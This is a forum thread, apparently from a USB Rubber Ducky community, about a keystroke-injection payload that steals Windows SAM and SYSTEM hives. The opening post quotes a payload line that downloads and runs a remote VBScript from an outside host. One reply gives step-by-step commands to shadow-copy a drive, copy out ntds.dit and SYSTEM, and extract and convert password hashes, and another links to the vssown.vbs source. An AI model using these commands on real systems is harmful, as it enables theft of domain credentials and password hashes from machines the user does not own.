Payload retrieve SAM and System from a live file system

[Kudzu_Kid]

I was looking at the payload scripts for my Ducky. I found one that I was looking for. It's the "Payload retrieve sam and system from a live file system" script featured here:

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---retrieve-sam-and-system-from-a-live-file-system

Naturally, I have an issue with it. The script has a line that says:

"STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs"

Nothing in my life is easy! %^} So, naturally http://tools.lanmaster53.com seems to be off the air right now.

So, I think this will be ok, I'll use my friend Google and find the script elsewhere, and then just edit the script to point to the new URL, once I find one.

The problem now is, I see vssown.vbs scattered on a few different sites, acredited to the same author everywhere I see it - yet when I look at the source, the script appears to be remarkably different in more than one location. Sooo, my qiestions are:
1) Does anyone actually have this scriot WORKING?
2) May I have a copy of it? Feel free to edit out any sensitive info if you must - directory names, etc. But please make it crystal clear what information what should be there... eg; "c:/windows/somedirecoty/somewhere/acme.exe" or whatever.

In essence, all I want to do is get the hash on the Ducky and test it for integrity later. .

All help, hints, tips appreciated.

Thanks,

Kudzu

[no42]

Step 1: Create Shadow Copy Drive (native command)

Creating the Shadowcopy of the drive CONTAINING the ntds.dit file (generally C: drive but could be somewhere else if the file is big):

vssadmin create shadow /for=[drive letter:]

Step 2: List Drives (native command)

Check the path to the Shadowcopy Copy Volume, i.e \\?GLOBALROOT|device...

vssadmin list shadows

Step 3: Copy Files (native command)

Copy the NTDS.dit and SYSTEM files out of the Volume(s):

copy \\?GLOBALROOT|device[...]ntdis.dit and \\?GLOBALROOT|device[...]SYSTEM to your machine

Step 4: Crack the Hash

Get the libesedb libraries from:

• http://code.google.com/p/libesedb/downloads/list

Extract and compile the libesedb libraries [./configure, make, make install, ldconfig]

Get the NTDSXtract framework - http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

After installing the libesedb libraries, extract the database tables from ntds.dit:

esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit <ntds.dit file>

Extract the hashes/user info/password history:

python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.4 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output

Note: the link_table id could be link_table.4 or link_table.5 depending on the previous output

Convert to pwdump format the output:

python ntdstopwdump.py /tmp/ntds.dit.output

[skysploit]

Here's a link to the actual VSSOwn: http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs

Here's LANMaster53's site: http://lanmaster53.com/